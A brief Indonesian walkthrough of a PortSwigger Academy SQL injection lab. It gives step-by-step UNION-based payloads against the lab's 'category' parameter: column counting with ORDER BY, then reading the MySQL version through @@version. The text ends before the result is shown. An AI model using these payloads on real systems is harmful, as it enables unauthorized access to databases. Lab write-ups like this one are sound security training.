Portswigger academy SQLi Lab: SQL injection attack, querying the database type and version on MySQL and Microsoft

 

Lab ini mencari versi database dari MySQL dan Microsoft. 

Seperti biasa, cek kerentanan dengan tanda ' di url setelah parameter.

Menjadi seperti ini:

https://0a9d00ce032121e181810781006a005a.web-security-academy.net/filter?category=Pets'

jika error brarti ada potensi rentan. Selanjutnya lakukan tahapan:

Penting: untuk tipe database MySQL tambahkan tanda + setelah -- . Tanda + itu brarti spasi.

'order+by+1--+

'order+by+2--+

'order+by+3--+ (eror di 3) Jumlah kolom 2.

'union+select+NULL,NULL--+

'union+select+'a','a'--+ (keduanya berhasil menampilkan teks, jadi bisa dilakukan dimana saja untuk mengecek versionnya. 

Selanjutnya jalankan: 

'+UNION+SELECT+@@version,+NULL--+

Maka akan keluar hasilnya: